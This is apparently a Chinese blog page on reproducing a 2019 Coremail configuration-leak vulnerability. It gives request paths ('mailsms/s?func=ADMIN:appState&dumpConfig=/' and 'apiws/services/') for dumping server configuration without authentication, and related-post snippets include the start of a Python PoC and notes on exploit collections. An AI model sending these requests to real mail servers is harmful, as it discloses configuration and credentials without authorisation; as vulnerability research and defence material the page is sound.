Coremail接口存配置读取漏洞POC

最新推荐文章于 2025-05-17 10:52:44 发布
原创 最新推荐文章于 2025-05-17 10:52:44 发布 · 1.6w 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#WEB安全 #Coremail

Coremail作为国内广泛使用的邮件系统,其产品在不同行业有着大量用户。文章介绍了如何复现Coremail接口存在的配置读取漏洞,包括通过访问`mailsms/s?func=ADMIN:appState&dumpConfig=/`和`apiws/services/`来检测漏洞是否存在,揭示了系统可能的安全风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。

截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户  ,是目前国内拥有邮箱使用用户最多的邮件系统。Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、电力、政府、金融、教育、尖端制造企业等用户提供邮件系统软件和反垃圾服务。

 

 

复现手法

1.mailsms

浏览器访问  http://host/mailsms/s?func=ADMIN:appState&dumpConfig=/

出现一些配置文件信息 证明存在该漏洞

出现404或者页面空白 则证明漏洞不存在

 

2.apiws

http://host/apiws/services/

http://host/./apiws/services/

最低0.47元/天 解锁文章

200万优质内容无限畅学
Coremail邮件系统配置信息泄露漏洞(CNVD-2019-16798)
墨痕诉清风的博客
11-09 8300
目前,论客公司已发布补丁进行修复,针对Coremail XT5和Coremail XT3/CM5版本,补丁编号为CMXT5-2019-0002,程序版本1.1.0-alphabuild20190524(3813d273)。综合CNVD技术支撑单位报送、白帽子报送、CNVD秘书处主动探测的结果显示,我国境内共有1484台服务器受此漏洞影响,影响比例约为4.0%。邮件系统的mailsms模块的参数大小写敏感在缺陷,使得攻击者利用该漏洞,在未授权的情况下,通过远程访问URL地址获知。...
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
08-21 4821
2023年国家护网目前收集到的0day和1day漏洞poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
Coremail邮件系统未授权访问
最新发布
swordheart的博客
05-17 346
Coremail邮件系统未授权访问,攻击者可获取管理员码。
coremail漏洞_Coremail多个安全漏洞预警
weixin_30880565的博客
01-30 4382
1.安全公告2019年6月14,Coremail发布了3个高危漏洞安全公告,补丁编号:CMXT5-2019-0001,涉及模块apiws,补丁修复IP限制不合理和在路径遍历的漏洞;补丁编号:CMXT5-2019-0002,涉及模块mailsms,补丁修复信息泄露的漏洞;补丁编号:CMXT5-2019-0003,涉及模块wmsvr,补丁修复信息泄露的漏洞、反射型XSS、路径遍历、...
Coremail 远程命令执行漏洞
Jdjdjjdjdjdje的博客
08-22 5051
OSCS 是国内首个开源软件供应链安全社区,社区联合开发者帮助全球顶级开源项目解决安全问题,并提供实时的安全漏洞情报,同时提供专业的代码安全检测工具为开发者免费使用。社区开发者可以通过配置飞书、钉钉、企业微信机器人获取一手的情报。在 Coremail XT5/XT6 版本中,邮件处理功能在溢出风险,攻击者构造恶意邮件,向任意邮箱地址发送该恶意邮件,当服务器处理邮件时,会触发漏洞,造成任意命令执行等危害。官方公告认为该漏洞不能稳定复现,在实际场景中难以利用,危害有限。
Coremail-0day敏感文件泄露漏洞送附批量检测脚本
热门推荐
god_Zeo的安全博客
06-17 2万+
漏洞介绍 Coremail邮件系统是业内唯一一款商用的超大规模运营级邮件系统,开始研发于1999年 [1] ,其前身为中国第一套中文电子邮件系统163\126,目前在中国的客户包括网易系列邮箱、中国移动手机邮箱(139)等国内领先的邮箱服务运营商,以及宝钢、首钢、南方电网、农业银行、交通银行、华润、神华、华能等世界500强中国企业,截止2019年,Coremail邮件系统产品在国内已拥有10亿终...
Coremail邮件系统配置文件泄露漏洞
weixin_30682415的博客
06-16 3058
Coremail论客邮件系统开始研发于1999年,是中国第一套中文邮件系统,目前在中国大陆地区拥有超过10亿终端用户,是网易、中华网等运营商至今一直使用的邮件系统,也是政府、事业单位、科教、企业等机构广泛使用的邮件系统。 2019年6月,网上流传出Coremail论客邮件系统配置文件泄露的漏洞,该漏洞无需认证即可获取邮件系统配置文件内容。 Coremail官网发布的漏洞公告:《关于Corem...
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 3945
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
2021 HW 漏洞清单汇总 ( 附 poc )
gjgj的博客
04-23 1万+
2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间 涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
Apache Tomcat被曝安全隐患,Coremail提醒您尽快加固
Coremail论客
02-25 2178
近日,CNVD(国家信息安全漏洞共享平台)公告Apache Tomcat被曝在文件包含漏洞。由于Tomcat AJP协议在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若服务器端同时在文件上传功能,攻击者可进一步实现远程代码的执行,威胁企业信息安全。 Tomcat 作为目前较为流行的 Web 应用服务器,应用范围较广,威胁影响较大。据...
高校邮箱频遭盗号:Coremail加强高校邮件安全防护
CACTER_S的博客
09-10 2286
2020年,受全球新型冠状病毒疫情的影响,高校教学、管理工作全面转向远程运行,高校所面临的数据隐私与信息安全威胁达到了历史最高水平。 高校远程网络授课已成常态化,提升高校的信息安全水平已刻不容缓! 而高校邮件系统承载着师生大量的学术信息往来,重要性不言而喻。 而且由于高校教育单位属于国家“关基”单位,其数据的特殊性与敏感性导致成为某些攻击者的重点攻击目标。 比如,CAC邮件安全大数据中心发现,在某国内某顶尖高校中,某些学生和老师的邮箱号每日遭受的暴力破解次数高达7000+! 如何加强邮件安全保护
Coremail与国家信息安全漏洞库(CNNVD)达成深度合作!
CACTER_S的博客
11-06 308
Coremail安全研究技术和漏洞挖掘技术的实力得到了国家权威机构的认可!
关于coremail的0day
谁的博客
06-14 3716
#-- Coding: utf-8 -- #Author: Vulkey_Chen #Email: gh0stkey@hi-ourlife.com #Website: www.hi-ourlife.com #About: mailsms config dump PoC import requests,sys def mailsmsPoC(url): url = url + “/mailsms/s?...
coremail服务器无响应,icoremail邮箱系统 邮件收发常见问题|创思Chance
weixin_34394265的博客
08-06 3824
▶ 为什么发到外域的邮件被退回?己方问题邮件的收件人地址错误是造成退信的主要原因。收件人的邮箱地址一般格式为name@domain.com,其中name为收件人的邮箱名,domain.com为收件人邮箱服务商的域名。这两部分中任何一部分填写错误都有可能造成退信。经过以上检查后您还是无法找到收件人地址的错误原因,请您联系对方,确认该邮件地址是否正确。对方问题收件人的邮箱或收件人的邮件服务商也有可能造...
再次捕获!重保期间拦截针对Coremail的钓鱼攻击
CACTER_S的博客
08-05 419
重保最新播报!#CACTER邮件网关 再次捕获钓鱼攻击。 ✅多轮反钓鱼演练必不可少,Coremail分享多轮真实演练经验!
[HW必备]|蓝队防守必须排查的57个安全漏洞与解决方案
03-18 5554
一、OA系统 二、E-mail 三、Web中间件 四、源代码管理 五、项目管理系统 六、开源运维监控 七、堡垒机
web漏洞总结(附exp、代码分析和漏洞修补),从零基础到精通,收藏这篇就够了!
Javachichi的博客
03-06 698
WEB中间件Tomcat是Apache Jakarta软件组织的一个子项目,Tomcat是一个JSP/Servlet容器,它是在SUN公司的JSWDK(Java Server Web Development Kit)基础上发展起来的一个JSP和Servlet规范的标准实现,使用Tomcat可以体验JSP和Servlet的最新规范。是一个运行EJB的J2EE应用服务器。它是开放源代码的项目,遵循最新的J2EE规范。
Outlook 漏洞链可导致零点击 RCE
smellycat000的专栏
12-21 273
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Akamai 公司的安全研究员分享了如何绕过微软 Outlook 零点击 RCE 漏洞补丁的详情。该漏洞编号为CVE-2023-23397,由微软在2023年3月修复,当时该漏洞已被俄罗斯国家黑客组织利用一年左右。未认证攻击者可发送包含非恶意通知链接的邮件提醒,诱骗 Outlook 客户端连接到受害者的服务器,导致 Net-NTLMv2 哈希被发...
Coremail通用ESLint配置:简化JavaScript代码质量控制
资源摘要信息:"eslint-config-coremail: Coremail项目的通用共享eslint配置文件" ESLint是一个在JavaScript中广泛使用的静态代码分析工具,它可以帮助开发者在代码运行之前发现错误和潜在问题。ESLint配置文件是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值